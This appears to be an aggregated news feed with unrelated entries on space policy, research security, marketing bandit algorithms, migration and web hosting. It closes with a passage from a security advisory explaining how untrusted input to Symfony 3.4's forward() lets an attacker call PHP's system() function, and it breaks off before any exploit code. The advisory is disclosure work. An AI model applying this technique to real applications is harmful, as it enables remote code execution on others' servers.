  • 4 new styles of magic usable by players: blood magic, ritual magic, rune magic, and tattoo magic (as played by SusieQ in Return of the Wraithborne)
  • Hundreds of new spells!
  • New magic item attunement options (as seen on Delvers' Society, Season 2).
  • Hundreds of new items, including gear, magic items, and cursed items.

The Players' Guide will be available in multiple formats, including: PDF, softcover, hardcover, and Fantasy Grounds vtt module.

Price: $0.00
          The Network, The Dream Traveler Book Two by Ernesto H Lee      Cache   Translate Page      
Ernesto H Lee, is originally from Coventry in the UK, but has mixed Spanish and German heritage. Previously He was working in Abu Dhabi and other areas of the Middle East for more than twenty years as an Electrical Engineer, but he has now retired and is a full time author and spends time between his homes in London and Madrid. His second book was published in August of 2018 and is the first in a series of books that follow the exploits of Detective Constable Sean McMillan, ‘The Dream Traveler’. This first book in the series has been awarded 9 Five Star ratings by the reviewers at Readers Favorite in addition to a Five Star rating on Amazon and Goodreads by Amazon Hall of Fame, Top 100 Reviewer, Grady Harp. "Ernesto H. Lee is showing all the signs of his becoming an important and gifted author. This is a fine novel and a highly recommended one. Grady Harp, August 18." The second book in the 'Dream Traveler' series 'The Network' was published on 31st October 2018. The Third book in the 'Dream Traveler' series is expected to be published by March 2019 For any questions or comments, the author can be contacted at: ernestohlee@gmail.com
          [TobagoJack] Maybe case in point, there is a law in the USA forbidden team USA to cooperate w...      Cache   Translate Page      
Maybe case in point, there is a law in the USA forbidden team USA to cooperate w/ team China on anything to do w/ space, and so China, unable to participate in the international space station, is building own, and soliciting all including USA to engage. As of now, a lot of would-be astronauts from many nations are studying mandarin, but alas, there is a sizeable crowd that intone a different approach and failed approach, per history does not matter and mathematics not important and no to hospitals

m.lasvegassun.com

Why Mars should be our next stop
By John Caves III

Tuesday, Nov. 6, 2018 | 2 a.m.

Almost 50 years have passed since the United States last put a man on the moon — or anywhere else outside of low-Earth orbit. As China builds an increasingly sophisticated space program, it is high time for America to get moving again.

On July 20, 1969, Neil Armstrong set foot on the moon.

NASA and the Space Task Group, appointed by President Richard Nixon to advise America’s next steps in space, pushed an ambitious plan calling for a manned expedition to Mars by 1986, at the latest. But Nixon nixed it.

Perhaps 1986 was not the right time to go to Mars. But 2036 may be.

China is emerging as a serious rival in a gradually unfolding 21st-century space race. As the world’s second-largest economy with high-tech aspirations, Beijing can afford an ambitious space program. Chinese astronauts have already been in low-Earth orbit, and the country plans to have a space station ready to launch by 2020.

By 2036, according to the deputy commander of China’s Manned Space Program, Beijing expects to land astronauts on the moon. At that point, China will have caught up to the United States in human space exploration and will then be poised to overtake it.

Unless the United States takes action to keep its lead.

The question, of course, is: Why should we? Going to the Moon and Mars is expensive, and there is nothing there but dirt and rocks. We have problems enough at home that need our money and attention, the argument goes. Besides, we have robots to explore space for us: the Voyager I probe has already made it clean out of the solar system.

That all misses the point. Mars may indeed be mostly dirt and rocks; but somewhere out there are planets that are just as alive as Earth. Astronomers are now identifying them at an ever-increasing rate.

Using robots to find those planets and scout them out before humans can get there is sound policy. But, eventually, humans will need to get there themselves.

Why? Because it’s there. Because, as Elon Musk and others have argued, humanity has a much better chance of surviving a catastrophic natural disaster, like the one that wiped out the dinosaurs, if we are a multiplanetary species.

Because, also, national might and prestige matter. If China explores the cosmos and exploits the resources of space while the United States sulks on Earth, America will lose power and influence here, and with it the ability to stand up to authoritarian bullying.

And if China settles new planets, it will impose its own system there. The future centers of human civilization will come into being under the thumb of tyranny, and not in the open hands of liberty. Imagine if Russia, and not Great Britain, had planted colonies on American soil. What would we be today?

For these reasons, as Caspar Weinberger, then deputy director of the Office of Management and Budget and later secretary of defense, put it to Nixon in a memorandum urging completion of the Apollo missions, “America should be able to afford something besides increased welfare, programs to repair our cities, or Appalachian relief and the like.”

Not that those other things are unimportant. Human space exploration is a long-term investment, for the country and for humankind. As we disburse resources for the immediate concerns we must address at home, we ought also to put enough aside to shape our future.

We also cannot leave space exploration solely to entrepreneurs such as Musk, as enthusiastic as they are. Space is an expensive and risky prospect for businesses. They will need infrastructure, security and a predictable legal regime in order to turn a profit. Only government can provide those public goods and ensure that our laws and liberties accompany us into the stars.

Private firms have a role, though, and the U.S. government, through NASA, ought to work with them to extend humanity’s reach into space, as government did with the railroad companies when the United States expanded west.

Habitable planets are many light-years away, and we do not yet have the technology to send people to them. That is where Mars comes in. It and the moons of Jupiter and Saturn can serve as stepping stones on the way out of the solar system, and not only in the literal sense of placing supply and fuel depots there.

Expeditions to Mars and Jupiter will compel our engineers and scientists to find more effective solutions to problems of spaceflight, making our spacecraft faster, lighter, more fuel-efficient and better able to penetrate the atmosphere of other planets. Humanity will be better placed to reach out to distant stars after a Mars mission than before it.

The United States, then, ought to reinvigorate NASA. We ought to send forth robotic probes before us to other solar systems. And when China goes to the Moon in 2036, we ought to go to Mars.

John Caves III, a captain in the U.S. Army from January 2013 to July 2017, is a graduate student at the Elliott School of International Affairs at George Washington University. He wrote this for InsideSources.com.

          [TobagoJack] this initiative may work out scmp.com US medical school Johns Hopkins bars for...      Cache   Translate Page      
this initiative may work out

scmp.com

US medical school Johns Hopkins bars foreign scientists over intellectual property riskThe Johns Hopkins University School of Medicine has halted a visiting scientist programme in response to a national investigation over whether scientists in the US are sharing research results with foreign governments, in particular China, the South China Morning Post has learned.

Although the suspension affects scientists from many countries who plan to conduct research at the top medical school, the move is primarily aimed at Chinese scientists and China’s flagship science talent recruitment programme, researchers for Beijing’s Thousand Talents Plan have said.

“Effective immediately, the Johns Hopkins School of Medicine is temporarily halting the appointment of visiting scientists due to concerns voiced by the National Institutes of Health [NIH] about threats to biomedical research and loss of intellectual property,” read an email late last month from the Johns Hopkins Hospital to its faculty, the Department of Neurology, which was seen by the Post.

The university’s fraud unit has also discovered that some individuals have fabricated their funding documentation, the email said.

Watch: US charges Chinese and Taiwanese firms with espionage

“Therefore, Johns Hopkins will not be hosting any visiting scientists [aside from those already here] until the NIH feels we can safely allow foreign nationals to be involved with government-sponsored research.”

In an earlier request for comment the medical school denied that it had halted the programme. It did not reply to a further request to respond to comments by scientists.

“While an email did go out to some faculty in one department, its contents were false,” a spokeswoman for the school said, adding that the school continued to offer and encourage visiting scientist appointments.

“Instead, what did happen was in response to a public message from NIH director Francis Collins, The Johns Hopkins University School of Medicine recently reminded faculty members to review and comply with NIH policies related to NIH-funded research activities that have a foreign component.”

US and China clash over Donald Trump’s intellectual property claims at WTO meeting

“The incident will affect up to 1,000 scientists if the suspension lasts a year, with many of them from China,” a US-based Chinese biomedical researcher told the Post. He agreed to be identified only by his surname, Zhang, for fears his comments might impact his career in the US.

“It’s necessary to protect intellectual property, but the suspension doesn’t help scientific research, which requires international collaboration,” said Zhang. “They need to strike a balance.”

China’s science talent recruitment programme has come under the spotlight of late, with US government agencies increasingly scrutinising Chinese programmes that they suspect are used to steal US technologies and intellectual property.

The most prominent of these is the Thousand Talents Plan, which was launched by Beijing in 2008 to tap into the talent of Chinese scientists educated or employed overseas.

It has attracted more than 7,000 researchers back to China – most from the US – with lucrative positions and substantial research grants. Many researchers in the programme maintain their overseas affiliations while working part-time in China.

The talent plan aims to “facilitate the legal and illicit transfer of US technology, intellectual property and know-how” to China, an analysis by the National Intelligence Council, a US intelligence unit, stated in April.

How China’s rampant intellectual property theft, long overlooked by US, sparked trade war

In August, the NIH, the nation’s largest research funder, began investigating whether grantees were sharing research findings with foreign governments, with NIH director Francis Collins sending a letter to more than 10,000 institutions to urge them to do likewise.

“The robustness of the biomedical research enterprise is under constant threat by risks to the security of intellectual property,” Collins said at a US Senate hearing in August after he sent the letter.

“But through conversations with law enforcement – and even just from watching the press – we can see that the magnitude of these risks is increasing.”

In response to a query, the NIH told the Post: “The goal of the efforts described in Dr Collins’ statement and letter to universities is to effectively root out examples where our system is being exploited.”

Trade war: why US and China remain so far apart on intellectual property rights

In a report titled Picking Flowers, Making Honey, the Australian Strategic Policy Institute last week alleged that China had been sending military scientists to Western universities to improve the People’s Liberation Army’s military capabilities.

According to the report, the PLA has sponsored more than 2,500 scientists to travel to universities in technologically advanced countries as students or visiting scholars over the past decade.


          Your Client Engagement Program Isn't Doing What You Think It Is.      Cache   Translate Page      

Amazing products without engaged clients are bound to fail, and companies claiming to have found the single best solution to client engagement are only fooling themselves.

What seems to work today to keep your clients engaged won't necessarily work tomorrow. The "optimal" client engagement tactic for your product will change over time and companies must be fluid and adaptable to accommodate ever-changing client needs and business strategies. Becoming complacent by settling for a strategy that works "for now" or "well enough" leads to risk aversion and unrealized potential. Constant recalibration is crucial, yet exploration can be costly and may lead nowhere. A principled approach to finding the right client engagement tactics at any point in time is essential.

Enter, Bandits!

Here at Stitch Fix, we prioritize personalization in every communication, interaction, and outreach opportunity we have with clients. Contextual bandits are one of the ways we enable this personalization.

In a nutshell, a contextual bandit is a framework that allows you to use algorithms to learn the most effective strategy for each individual client, while simultaneously using randomization to continuously track how successful each of your different action choices are.

Implementing a contextual-bandit-based client engagement program will allow you to:

  1. Understand how the performance of your tactics change over time;
  2. Select a personalized tactic for each client based on his or her unique characteristics;
  3. Introduce new tactics relevant to subpopulations of clients in a systematic manner; and
  4. Continuously refine and improve your algorithms.

Part 1: There are Significant Limitations to Typical Client Engagement Approaches.

Let's set up a simple, clear example.

Current state: There are a group of individuals who have used your product in the past, but are no longer actively engaged. You want to remind them about your great product.

Proposed idea: We'll do an email campaign. Clients who haven't interacted with you for a while will be eligible to receive this email, and the purpose is to get them to visit your website. (Note that instead of email, we could just as easily use a widget on a website, a letter in the mail, or any other method of communicating with clients.)

The One Size Fits All Method

Your team brainstorms several tactics and decides to run a test to see which one works best. Let's use a simple three-tactic example here:

  1. Tactic A: no email. This is our control, which we can use to establish a baseline for client behavior;
  2. Tactic B: an emailed invitation to work 1-on-1 with (in our case) an expert stylist via email to make sure we get you exactly what you want; and
  3. Tactic C: an emailed promotional offer.

You run this test and find that Tactic B works the best. As such, you decide to scale Tactic B out to all clients, since it is expected to maximize return.

This is an endpoint in many marketing and product pipelines. The team celebrates the discovery of the "best" strategy and now it's time to move on to the next project; Case closed.

Main Limitations with this Approach

  1. You have no idea how long Tactic B will continue to be the best. Let's say over the next year your product improves and expands, leading to a change in the demographics of your client base. How confident are you that Tactic B is still the best?
  2. There is no personalization. All clients are receiving Tactic B. Some subsegment of clients likely would have performed better with Tactic C, but by scaling out Tactic B to all clients, these clients did not receive their optimal tactic.
  3. You are not taking advantage of key pieces of information. Since everyone in this audience was a previous client, you have information on how they interacted with you in the past! To address this, teams frequently build out a decision tree that groups their clients into broad categories (such as by age or tenure with the company). However…
  4. Using decision trees to group clients into categories leads to unoptimized outreach programs. Each category of clients might get a different tactic, and as new tactics or categories are created, these trees can grow larger and larger. Many of you have seen it: 10+ branch decision trees that try to segment a client base into different categories. When these trees grow too large, not only do they become difficult to manage, but it becomes more and more questionable whether or not you are actually doing what you think you are doing.
Does this look like your program?

Part 2: Multi-Armed Bandits Allows Continuous Monitoring

The above situation is common, suboptimal, and headache-inducing. Developing a testing and implementation strategy with bandits can remove or reduce many of these limitations.

A standard multi-armed bandit is the most basic bandit implementation. It allows us to allocate a small amount of clients to continuously explore how different tactics are performing, while giving the majority of clients the current one-size-fits-all best-performing tactic. The standard implementation updates which tactic is best after every client interaction, allowing you to quickly settle on the most effective large-scale tactic.

To get into more technical detail, a multi-armed bandit is a system where you must select one action from a set of possible actions for a given 'resource' (in our example, the 'resource' is a client). The 'reward' (if a client responds to the offer or not) for the selected action is exposed, but the reward for all other actions remains unknown (we don't know what a specific client would have done if we had sent them a different offer!).

The reward for a given action can be thought of as a random reward drawn from a probability distribution specific to that action. Because these probability distributions may not be known or may change over time, we want this system to allocate some resources to improving our understanding of the different choices ('exploration') while simultaneously maximizing our expected gains based on our historical knowledge ('exploitation'). Our goal is to minimize "regret," defined as the difference between the sum of rewards if we used an optimal strategy and the actual sum of rewards realized.

Mathematically, if we have a bandit with K choices (K arms), we can define a reward for 1 ≤ i ≤ K and n ≥ 1, where i is an arm of the bandit and n is the round we are currently considering.

Each round yields a reward The reward of each round is a function of which arm was selected for the client, and is assumed to be independent of both the rewards from previous rounds and the distributions of the other arms, and only dependent upon the probability distribution associated with the selected arm.

We thus want to minimized our regret, defined as:

, where total number of rounds, maximum reward, and is the reward in round n from selecting arm i.

There are numerous strategies that can be utilized to select how clients are allocated to either exploitation or exploration in order to minimize the regret of your bandit. For this article, we will consider the simplest, called the epsilon-greedy algorithm. In the epsilon-greedy algorithm, the best action is selected for 1−ϵ of your audience entering your program, and a random action is selected for the remaining ϵ of your audience. ϵ can be set to any value, depending on how many resources you want to allocate to exploration. For example, if ϵ is set to 0.1, then 10% of your audience is being directed to exploration, and 90% of your audience is being directed to your best tactic. If desired, ϵ can be decreased over time to reduce the total regret of your system. Other popular allocation strategies that can reduce the overall regret of your system include Thompson sampling and UCB1[1][2].

Back to our Example

Let’s get back to our 3-tactic email test, and set up a standard multi-armed bandit. We need to decide to reach out to a client with either Tactic A, B, or C. We are going to use an epsilon-greedy approach and set ϵ=0.1. 10% of our clients will randomly be presented with one of the three tactics. The other 90% will receive whichever tactic is the current top-performer. Each time we give a client a tactic, we update the score for that tactic. We then examine the performance of the different tactics, and re-assign the best-performing tactic to the one with the highest score.

In the early stages of a standard multi-armed bandit, switching may occur frequently in the first few passes, but the pipeline will quickly stabalize.

The above animation demonstrates a simple, standard multi-armed bandit to help get you started thinking about how a bandit implementation might look. This example already allows us to continuously monitor how tactics are performing and actively redirects most of our audience to the current "best" tactic, but there is plenty more we can do to improve performance! For example, if we want to further minimize regret, we would want to use a more powerful regret-minimization technique (UCB1, Thompson Sampling, etc.) If we are nervous about our client population changing over time, we can implement a forgetting factor to down-weight older data points. New tactics can be added to this framework in a similar manner.

Part 3: Personalize Outreach with Contextual Bandits

While we have already improved upon our original example, let's take this a step further to get to true personalization.

Contextual bandits provide an extension to the bandit framework where a context (feature-vector) is associated with each client.[3] This allows us to personalize the action taken on each individual client, rather than simply applying the overall best tactic. For example, while Tactic B might perform the best if applied to all clients, there are certainly some clients who would respond better to Tactic C.

What this means in terms of our example is that instead of 90% of our clients being sent the one-size-fits-all best email, these clients instead enter our "selection algorithm." We then read in relevant features of these clients to decide which outreach tactic best suits each client’s needs and results in the best outcomes. We continue to assign 10% clients to a random tactic, because this lets us know the unbiased performance of each tactic and provides us with data to periodically retrain our selection algorithm.

To get started, we need to take some unbiased data and train a machine learning model. Let’s assume we have been running the multi-arm bandit above: because we randomly assigned clients to our different tactics, we can use this data to train our algorithm! The point here is to understand which clients we should be assigning to each tactic, or, for a given client, which tactic gives this client the highest probability of having a positive outcome.

In a Contextual Bandit, we use client features to select the best tactic for the majority of our clients and continue to pull in data from our randomly allocated clients to retrain our algorithm.

While a multi-armed bandit can be relatively quick to implement, a contextual bandit adds a decent amount of complexity to our problem. In addition to training and applying a machine learning model to the majority of clients, there are a number of additional behind-the-scenes steps that must be taken: for example, we need to establish a cadence for retraining this model as we continue to acquire more data, as well as build out significantly more logging in order to track from which pathway clients are being assigned to different tactics.

Why do we care about which pathway clients received an offer from? If we use an algorithm to assign a tactic to a client, clients with certain characteristics are more likely to be assigned to certain tactics. This is why it is important to have some clients assigned randomly: we can be confident that, in the random assignments, the underlying client distributions are the same for all tactics.

Contextual Considerations

Depending on the regret-minimization strategy, there may be restrictions on the type of model you can build. For example, using an epsilon-greedy strategy allows you to use any model you like. However, with Thompson sampling, using a non-linear model introduces significant additional challenges.[5] When deciding how to approach regret minimization, make sure to take your desired modeling approach into account.

No implementation is perfect, and bandits are no exception. Both multi-armed bandits and contextual bandits are best utilized when we have a clear, well-defined 'reward' – maybe this is clicking on a webpage banner, or clicking through an email, or purchasing something. If you can't concretely define a reward, you can't say whether or not a tactic was successful, let alone train a model. In addition, if you have significantly delayed feedback you will have to do some additional work to get everything running smoothly[4]. Contextual bandits also lead to more complex code, which gives more room for things to break when compared to implementing simpler strategies.

Finally, think carefully about real-world restrictions: for example, while a contextual bandit can support a large number of tactics, if you have very few clients entering the program you are not going to be gaining much information from your random test group ϵ . In this case, it may be wise to restrict the number of tactics to something manageable. Remember though, you can always remove tactics to make room for new ones!

Part 4: Summary and Final Thoughts

Expanding your program from using business-logic-driven decision making to model-based decision making can significantly improve the performance of your client engagement strategies, and bandits can be a great tool to facilitate this transition.

While the example we used involved email, this same pipeline can be applied in a variety of different domains. Other examples include prioritizing widgets on a webpage, modifying the flow clients experience as they click through forms on your website, or many other situations where you are performing client outreach.

If you currently have a single tactic scaled out to all clients and are not gathering any unbiased data, one viable approach to improve this situation would be to first transition to a multi-armed bandit, and then at a later timepoint transition to a contextual bandit. A basic multi-armed bandit can be quick to implement and allow you to begin gathering unbiased data. Eventually, utilizing a contextual bandit in your client engagement strategy will allow you to active adjust to changing client climates and needs, continuously test strategies, and personalize, personalize, personalize!

References

[1]↩ Minimizing Regret: https://link.springer.com/content/pdf/10.1023%2FA%3A1013689704352.pdf
[2]↩ Thompson sampling: http://proceedings.mlr.press/v23/agrawal12/agrawal12.pdf
[3]↩ Contextual bandits seminal paper: https://arxiv.org/pdf/1003.0146.pdf
[4]↩ Delayed Feedback: https://arxiv.org/pdf/1803.10937.pdf
[5]↩ Another Thompson Sampling Paper: https://pdfs.semanticscholar.org/1c21/2b33a91d7b1c9878af0395d4992a6d4e0d54.pdf

          débroussailleur saisonnier/débroussailleuse saisonnière - exploitation forestière et foresterie - NIKONAL INC. - Trois-Rives, QC      Cache   Translate Page      
Salaire min. 1 500,00 $ max. 2 500,00 $ par semaine pour 60 heures par semaine. Renseignements sur l’emploi. Date prévue de début Dès que possible.... $2,500 a week
From Guichet emplois - Fri, 26 Oct 2018 09:38:16 GMT - View all Trois-Rives, QC jobs
          Boogie Nights (1997) DVD9, Blu-Ray      Cache   Translate Page      
A film about the porn industry may seem shocking or offensive to some, but Paul Thomas Anderson's Boogie Nights is more than merely an expose on the exploits of porn. Boogie Nights is a colorful, emotional drama about the halcyon days of the industry and the real people within it. The year is 1977. Nightclubs […] ↓ Download movie...
          Government to research temporary migrant worker exploitation; Stays quiet on election promise to 'take a breather on immigration'      Cache   Translate Page      
Iain Lees-Galloway by Jacky Carpenter.

The Government is sticking to its word and making moves to prevent migrant workers from being exploited.

However it isn’t any closer to reducing annual net migration by 20,000 to 30,000 people a year, as it estimated it would before the 2017 election. 

The Immigration and Workplace Relations and Safety Minister Iain Lees-Galloway has directed the Ministry of Business, Innovation and Employment to set up a working group to research temporary migrant worker exploitation.

“Migrant exploitation takes many forms, including workers not getting paid properly, working excessive hours or in unsafe conditions,” he says.

“Crucially, far too many migrant workers do not feel empowered to speak up or seek help when they are being subjected to unfair conditions.”

The review will be done with Auckland UniServices and will see migrants, businesses, workers, academics and international students consulted with.

Lees-Galloway says the research will take some time to complete, so he’ll only make decisions on it in 2019.

To date, the only tweak he has made to immigration settings are around post-study work rights.

As of November 26, it will be harder for international students who have graduated with lower level qualifications to stay on in New Zealand.

They will however no longer need to be sponsored by an employer to stay under a post-study work visa – the idea being for this to reduce the likelihood of employers exploiting them.

When Lees-Galloway made this announcement in June, he said around 12,000 to 16,000 international students would be affected.

When he said “affected” he meant the changes would deter some international students from coming to New Zealand and see some leave sooner than they may otherwise have. However they might also encourage some students to do degree level courses.

So all-in-all, the change wouldn’t necessarily see annual net migration fall by 12,000 to 16,000 people.

Lees-Galloway’s office has told interest.co.nz there is other work underway in the temporary work visa space, so we can expect to see an announcement on this before the end of the year.

Annual net migration has come off its July 2017 peak of 72,402. It’s now at 62,733.

The fall is the result of a modest drop in the number of people arriving in New Zealand on a long-term basis; the biggest decline in new arrivals being from China.

The number of people leaving the country is also up, with China also recording the biggest change in departures.

Furthermore, New Zealand citizens continue to leave the country in greater numbers than those who return after an extended stay overseas.

Net long term migration

Select chart tabs »
The 'Net long term migration monthly gain or loss' chart will be drawn here.
Loading...
The 'Net migration to Australia annual rate (000)' chart will be drawn here.
Loading...
The ' Net long term migration - annual' chart will be drawn here.
Loading...

          Le premier Tour de Grande-Bretagne à la nage de l’Histoire (photos)      Cache   Translate Page      
157 jours: c’est le temps qu’il a fallu au Britannique Ross Edgley, 33 ans, pour faire le tour de la Grande-Bretagne à la nage, réalisant ainsi un exploit sans précédent. Après avoir bouclé quelque 2.864 kilomètres autour des côtes britanniques, le sportif a finalement rejoint la terre ferme.
          "It isn't that we're prostitutes": Child protection and sexual exploitation of adolescent girls within and beyond refugee camps in Rwanda - Williams TP, Chopra V, Chikanya SR.       Cache   Translate Page      
BACKGROUND: While refugee camps can protect children from harm, they can also introduce new risks and vulnerabilities. Research suggests that adolescent girls are at particular risk for gender-based violence and sexual exploitation. OBJECTIVE: This...
          Sex according to porn      Cache   Translate Page      

The unrealistic picture of sex presented in most porn harms men as well as women in their sex lives (though in different ways). Their sexual miseducation starts in adolescence, but many never learn better.

Our society's taboo cuts adolescents off from any way to learn about sexual relationships and lovemaking other than from porn and from other confused adolescents. Everyone learns the hard way, often slowly, and in many cases learns bad lessons.

The more effective the taboo, the deeper the ignorance. In 18th century France, teenage girls of good family emerged totally sexually innocent from education in a convent. Totally innocent and totally exploitable (see Dangerous Liaisons).

Contrast this with Marquesan society, where adolescents are not kept ignorant by a taboo on sex. They have various relationships with lovers of their choice, so they have many opportunities to see what pleases and what doesn't. Any one lover can please them more, or please them less, but can't mislead them — they have standards for comparison. In that society, even adolescents understand lovemaking better than a lot of American adults.

Inevitably, everyone starts out ignorant; the question is, how can society offer people a path which leads them to learn to do things well, rather than learning painfully to do them badly.

          Commentaires sur Windows 10, Windows 7 va s’incliner, bilan par anonyme      Cache   Translate Page      
-et c'est bien regrettable que linux (ubuntu,debian,etc..) n'occupe que 1,38% du parc des PC-maintenant ce faible pourcentage s'explique aussi=déjà acheter un PC avec ubuntu pré installé !!!!et puis il y a quand même une façon de penser linux,qui est un peu plus geek que grand public (exemple;les paquets...) -maintenant que W10 supplante W7,quel exploit...c'est sûr la clio a aussi supplantée un jour la super5-non,ce qu'il faut retenir,c'est le temps (plus de 3 ans après son lancement) qu'il aura fallut à ce "fameux" W10 pour simplement égaler le toujours apprécié windows 7-là,ça se passe de commentaires
          This Company Wants to Make the Internet Load Faster      Cache   Translate Page      

The internet went down on February 28, 2017. Or at least that's how it seemed to some users as sites and apps like Slack and Medium went offline or malfunctioned for four hours. What actually happened is that Amazon's enormously popular S3 cloud storage service experienced an outage , affecting everything that depended on it.

It was a reminder of the risks when too much of the internet relies on a single service. Amazon gives customers the option of storing their data in different "availability regions" around the world, and within those regions it has multiple data centers in case something goes wrong. But last year's outage knocked out S3 in the entire North Virginia region. Customers could of course use other regions, or other clouds, as backups, but that involves extra work, including possibly managing accounts with multiple cloud providers.

A San Francisco based startup called Netlify wants to make it easier to avoid these sorts of outages by automatically distributing its customers’ content to multiple cloud computing providers. Users don't need accounts with Amazon, Microsoft Azure, Rackspace, or any other cloud company―Netlify maintains relationships with those services. You just sign-up for Netlify, and it handles the rest.

You can think of the company's core service as a cross between traditional web hosting providers and content delivery networks, like Akamai, that cache content on servers around the world to speed up websites and apps. Netlify has already attracted some big tech names as customers, often to host websites related to open source projects. For example, Google uses Netlify for the website for its infrastructure management tool Kubernetes, and Facebook uses the service for its programming framework React. But Netlify founders Christian Bach and Mathias Biilmann don't want to just be middlemen for cloud hosting. They want to fundamentally change how web applications are built, and put Netlify at the center.

Traditionally, web applications have run mostly on servers. The applications run their code in the cloud, or in a company's own data center, assemble a web page based on the results, and send the result to your browser. But as browsers have grown more sophisticated, web developers have begun shifting computing workloads to the browser. Today, browser-based apps like Google Docs or Facebook feel like desktop applications. Netlify aims to make it easier to build, publish, and maintain these types of sites.

Back to the Static Future

Markus Seyfferth, the COO of Smashing Media, was converted to Netlify's vision when he saw Biilman speak at a conference in 2016. Smashing Media, which publishes the web design and development publication Smashing Magazine and organizes the Smashing Conference, was looking to change the way it managed its roughly 3,200-page website.

Since its inception in 2006, Smashing Magazine had been powered by WordPress, the content management system that runs about 32 percent of the web according to technology survey outfit W3Techs, along with e-commerce tools to handle sales of books and conference tickets and a third application for managing its job listing site. Using three different systems was unwieldy, and the company's servers struggled to handle the site’s traffic, so Seyfferth was looking for a new approach.

When you write or edit a blog post in WordPress or similar applications, the software stores your content in a database. When someone visits your site, the server runs WordPress to pull the latest version from the database, along with any comments that have been posted, and assembles it into a page that it sends to the browser.

Building pages on the fly like this ensures that users always see the most recent version of a page, but it's slower than serving prebuilt "static" pages that have been generated in advance. And when lots of people are trying to visit a site at the same time, servers can bog down trying to build pages on the fly for each visitor, which can lead to outages. That leads companies to buy more servers than they typically need; what’s more, servers can still be overloaded at times.

"When we had a new product on the shop, it needed only a couple hundred orders in one hour and the shop would go down," Seyfferth says.

WordPress and similar applications try to make things faster and more efficient by "caching" content to reduce how often the software has to query the database, but it's still not as fast as serving static content.

Static content is also more secure. Using WordPress or similar content managers exposes at least two "attack surfaces" for hackers: the server itself, and the content management software. By removing the content management layer, and simply serving static content, the overall "attack surface" shrinks, meaning hackers have fewer ways to exploit software.

The security and performance advantages of static websites have made them increasingly popular with software developers in recent years, first for personal blogs and now for the websites for popular open source projects.

In a way, these static sites are a throwback to the early days of the web, when practically all content was static. Web developers updated pages manually and uploaded pre-built pages to the web. But the rise of blogs and other interactive websites in the early 2000s popularized server-side applications that made it possible for non-technical users to add or edit content, without special software. The same software also allowed readers to add comments or contribute content directly to a site.

At Smashing Media, Seyfferth didn't initially think static was an option. The company needed interactive features, to accept comments, process credit cards, and allow users to post job listings. So Netlify built several new features into its platform to make a primarily static approach more viable for Smashing Media.

The Glue in the Cloud

Biilmann, a native of Denmark, spotted the trend back to static sites while running a content management startup in San Francisco, and started a predecessor to Netlify called Bit Balloon in 2013. He invited Bach, his childhood best friend who was then working as an executive at a creative services agency in Denmark, to join him in 2015 and Netlify was born.

Initially, Netlify focused on hosting static sites. The company quickly attracted high-profile open source users, but Biilman and Bach wanted Netlify to be more than just another web-hosting company; they sought to make static sites viable for interactive websites.

Open source programming frameworks have made it easier to build sophisticated applications in the browser . And there's a growing ecosystem of services like Stripe for payments, Auth0 for user authentication, and Amazon Lambda for running small chunks of custom code, that make it possible to outsource many interactive features to the cloud. But these types of services can be hard to use with static sites because some sort of server side application is often needed to act as a middleman between the cloud and the browser.

Biilmann and Bach want Netlify to be that middleman, or as they put it, the "glue" between disparate cloud computing services. For example, they built an e-commerce feature for Smashing Media, now available to all Netlify customers, that integrates with Stripe. It also offers tools for managing code that runs on Lambda.

Smashing Media switched to Netlify about a year ago, and Seyfferth says it's been a success. It's much cheaper and more stable than traditional web application hosting. "Now the site pretty much always stays up no matter how many users," he says. "We'd never want to look back to what we were using before."

There are still some downsides. WordPress makes it easy for non-technical users to add, edit, and manage content. Static site software tends to be less sophisticated and harder to use. Netlify is trying to address that with its own open source static content management interface called Netlify CMS. But it's still rough.

Seyfferth says for many publications, it makes more sense to stick with WordPress for now because Netlify can still be challenging for non-technical users.

And while Netlify is a developer darling today, it's possible that major cloud providers could replicate some of its features. Google already offers a service called Firebase Hosting that offers some similar functionality.

For now, though, Bach and Biilmann say they're just focused on making their serverless vision practical for more companies. The more people who come around to this new approach, the more opportunities there are not just for Netlify, but for the entire new ecosystem.

More Great WIRED Stories Self-improvement in the internet age andhow we learn A drone-flinging cannon proves UAVscan mangle planes Google's human-sounding phone bot comes to the Pixel How Jump designed aglobal electric bike US weapons systems are easy cyberattack targets Looking for more? Sign up for our daily newsletter and never miss our latest and greatest stories
          SSD Advisory Symfony Framework forward() Remote Code Execution      Cache   Translate Page      

Vulnerability Summary

The following advisory describes a vulnerability found in Symfony 3.4 a php framework that is used to create websites and web applications. Built on top of the Symfony Components. Under certain conditions, the Symfony framework can be abused to trigger RCE in the HttpKernel (http-kernel) component, while forward() is considered by the vendor as an equivalent to eval() (in its security implications) there is no mentioning of this in the current documentation.

Vendor Response

“As previously noted, unless there is something we are missing, the forward() method itself does not have a security vulnerability, but you believe having public methods that accept callables as arguments is in itself a security vulnerability. The forward() method allows you to pass a callable to it which, like many methods in many libraries including many common functions in PHP core such as array_filter (https://secure.php.net/manual/en/function.array-filter.php), if you pass untrusted user input into it, then it could result in remote code execution.

As with SQL queries, outputting data onto a page, using callables or using eval(), if you pass untrusted user input into them, it can result in security issues whether it be remote code execution, SQL injection or an XSS issue. As a framework, Symfony will attempt to aid users to write more secure code and provide tools for this, but a framework cannot assume complete and total responsibility as developers can always write insecure code and should always be aware of how they use unvalidated user input.

As I hope I’ve explained we do not believe this to be a security vulnerability, but if you believe we are still missing something, please do let us know.”

We disagree with this assessment, looking up examples of how to use forward(), there is no mentioning by anyone that you should filter user provided data as it may trigger a code execution vulnerability (unlike eval() equivalent or SQL statements equivalent examples), we therefore believe its prudent to publicly announce this issue.

Credit

Independent security researcher, Calum Hutton, have reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Affected systems

Symfony Framework 3.4.* Running on linux Systems.

Vulnerability Details

The vulnerability occurs when the untrusted user data is passed into the forward() function provided by the frameworks AbstractController class. If this function is called in application code with untrusted user input, the application is potentially at risk of this issue.

Symfony allows for controllers to be any PHP callable (https://symfony.com/doc/current/controller.html#a-simple-controller) which gives great flexibity to the developer, but also potentially unforeseen consequences. Because of this, the string ‘system’ would be considered a valid controller, as it is a valid callable and would resolve to the builtin system() function. Symfony would successfully resolve and instantiate the controller instance and attempt to resolve the arguments required to call the new controller from the provided arguments and request context. This would normally fail (depending on the names, and number of arguments), causing the entire controller resolution to fail. One array that is searched for appropriate argument names during argument resolution is the path array passed into the AbstractController::forward() function.

Hence, by controlling the first (controller name/callable) and at least partially the second (path array) parameters of the AbstractController::forward() function, it is possible to call arbitrary PHP functions leading to RCE.

How to Exploit

One way developers might introduce parameters into the path array to pass on to the forwarded controller is through named URL route parameters. Consider the following route definition:

forward:

